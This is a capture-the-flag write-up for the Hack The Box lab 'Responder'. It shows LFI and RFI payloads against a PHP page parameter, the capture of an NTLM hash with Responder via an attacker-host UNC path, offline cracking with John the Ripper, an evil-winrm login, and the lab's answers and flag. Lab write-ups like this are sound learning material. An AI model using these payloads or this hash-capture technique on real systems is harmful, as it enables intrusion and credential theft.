Responder (Tier 1)

Description

Tier -> 1
Difficult -> Very Easy
OS -> Linux
Tags -> WinRM / Custom Applications / Protocols / XAMPP / SMB / Responder / PHP / Reconnaissance / Password Cracking / Hash Capture / Remote File Inclusion / Remote Code Execution

nmap -p- -Pn --min-rate 2000 10.129.215.213

Then I did an exhaustive scan to get more information about the service running on the open port

nmap -p80 -sVC 10.129.215.213

I found the HTTP protocol running on port 80, so I went to the browser to check the content being deployed. Hitting the site using the IP redirected me to a domain named unika.htb, but I was unable to reach the server

To learn more about the HTTP protocol you can go here

Answer: unika.htb

The reason why the page didn't show me content was that it wasn't on my list of known hosts. To fix this I added it by modifying the /etc/hosts file, relating the IP to the unika.htb domain. After that, I hit the site again, and it worked properly

sudo nano /etc/hosts

Once there, I found a dashboard page for a business with some buttons which didn't work. Exploring the page I didn't find anything relevant so I used the Wappalyzer extension to get some extra information about the technologies of the site

Answer: php

Navigating to the top right corner I found a slider to select the language of the page which caught my attention. When I selected a different language from english, the language of the whole page changed and the URL showed a query reflecting this action

Answer: page

To test if this query could be vulnerable to a Local File Inclusion attack, I tried listing the contents of the /etc/hosts file by changing the value of the page parameter. After some tries, I found a successful payload and displayed the content of the asked file

Payload

page=../../../../../../../../windows/system32/drivers/etc/hosts

To learn more about Local File Inclusion exploitation you can go here

Answer: ../../../../../../../../windows/system32/drivers/etc/hosts

Answer: //10.10.14.6/somefile

Answer: New Technology Lan Manager

Answer: -I

Answer: John The Ripper

Knowing that I could abuse this, I tried using the Responder utility to intercept the communication between the web server and the local system. That was to try to catch the credentials for the internal SMB service, based on the fact that it was a Windows system and could be running it. I started configuring the tool, so I modified the Responder.config file to set the value SMB to On

sudo nano /usr/share/responder/Responder.conf

After that, I initialized the tool specifying the network interface I wanted to use, in this case, the tun0 interface

We can check the interface using theifconfig command. Normally the tun0 interface is the one related to the connection with a VPN

Then I went to the vulnerable endpoint again to modify the URL and tried to do in this case a Remote File Inclusion to my machine, to connect to the Responder server I had deployed. With this action, the page displayed an error but when checking the terminal, Responder had caught the credentials of the target

Payload

page=//10.10.14.195/somefile

To learn more about Remote File Inclusion exploitation you can go here

I caught the communication from the Administrator user and the corresponding hash, so I saved it in a text file. I could try to break the hash using the John The Ripper tool and the well-known rouckyou.txt dictionary. After running it, I observed the cracking process was successful, obtaining the password badminton for the user Administrator

john -w=/usr/share/wordlists/rockyou.txt hash.txt

Answer: badminton

Answer: 5985

Having these credentials, I could try to connect to the system directly. For this purpose, I used the evil-winrm tool to try to get a shell and it worked successfully

Searching through the system, I found a file called flag.txt in the C:\Users\mike\Desktop folder. Finally, I checked the content of the flag.txt file, retrieving the flag

Answer: ea81b7afddd03efaa0945333ed147fac

Last updated 4 months ago